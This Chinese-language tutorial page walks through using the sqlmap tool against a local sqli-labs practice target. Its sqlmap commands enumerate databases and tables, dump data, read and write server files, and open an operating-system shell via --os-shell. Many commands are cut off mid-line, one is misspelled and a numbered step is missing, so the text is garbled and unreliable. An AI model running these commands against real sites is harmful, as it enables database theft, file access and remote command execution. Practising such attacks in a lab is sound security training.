您好,登錄后才能下訂單哦!
這篇文章給大家介紹注入工具sqlmap如何進行枚舉信息,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
一、列舉數據庫名
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --dbs
二、列舉數據庫表
qlmap -u "http://192.168.1.121/sqli/Less-1/?id=1"-D security --tables
四、列舉數據值
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1">
五、列舉schema信息,
--exclude-sysdbs 排除系統數據庫
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1">
六、檢索表中數據的數量
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1">
七、暴力破解數據
mysql<5.0時,沒有information_schema
--common-columns獲取表名和列名,需要自己導入字典
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1">
八、讀取文件,
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --file-read="C:\phpStudy\PHPTutorial\WWW\index.php"
九、寫入文件
--file-write 本地文件
--file-dest 遠程寫入文件
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1">
十、檢索所有信息
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" -a
十一、執行系統個命令
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --os-shell
關于注入工具sqlmap如何進行枚舉信息就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。